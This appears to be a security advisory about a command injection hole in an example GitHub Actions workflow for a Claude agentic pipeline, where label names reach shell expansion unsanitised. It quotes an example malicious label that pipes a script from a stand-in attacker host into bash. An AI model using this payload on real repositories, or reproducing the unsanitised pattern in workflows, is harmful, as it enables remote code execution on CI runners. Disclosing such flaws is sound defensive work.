GitHub Workflow Vulnerability: Command Injection in Claude Agentic Pipeline Example via github.event.label.name

A high-risk command injection vulnerability exists in a public GitHub Actions workflow example, exposing repositories to potential remote code execution. The flaw resides in the `examples/claude-agentic-pipeline.yml` file, where user-controlled input from `github.event.label.name` is directly used in shell variable expansion without any validation or sanitization. This creates a direct path for attackers to execute arbitrary commands on the runner environment.

The vulnerability is located on lines 86 and 92 of the workflow file. The pipeline assigns the label name to an environment variable (`PIPELINE_STAGE`) and later uses it in a shell string construction. Because the input is not escaped or validated, an attacker who can create a label—such as any user with write access to the repository or one who successfully social-engineers a label creation—can inject shell commands. A malicious label name like `claude:design`$(curl -s attacker.com/evil.sh|bash)` would be executed when the workflow runs, potentially leading to full compromise of the runner.

This vulnerability places any repository using or adapting this example workflow at immediate risk. The exposure is not theoretical; it is a concrete, exploitable flaw in a publicly available template that could be widely copied. The risk is amplified because the attack surface includes any user with write permissions, a common access level in collaborative development environments. This incident highlights the critical need for rigorous input validation in CI/CD pipelines and serves as a stark warning about the security implications of using community examples without thorough security review.